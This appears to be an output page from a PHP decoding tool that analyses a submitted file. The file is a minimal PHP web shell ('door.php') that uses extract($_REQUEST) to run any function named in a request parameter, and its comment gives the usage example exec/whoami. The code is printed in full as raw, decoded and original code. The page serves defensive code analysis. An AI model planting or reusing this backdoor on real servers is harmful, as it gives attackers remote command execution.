Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php //door.php?ctime=exec&atime=whoami @extract ($_REQUEST); @die ($ctime($atime)); ?>..
Decoded Output download
<?php
//door.php?ctime=exec&atime=whoami
@extract ($_REQUEST);
@die ($ctime($atime));
?>
Did this file decode correctly?
Original Code
<?php
//door.php?ctime=exec&atime=whoami
@extract ($_REQUEST);
@die ($ctime($atime));
?>
Function Calls
extract | 1 |
Stats
MD5 | d2e4c74d6a2e9a0df5f171c08426a22c |
Eval Count | 0 |
Decode Time | 103 ms |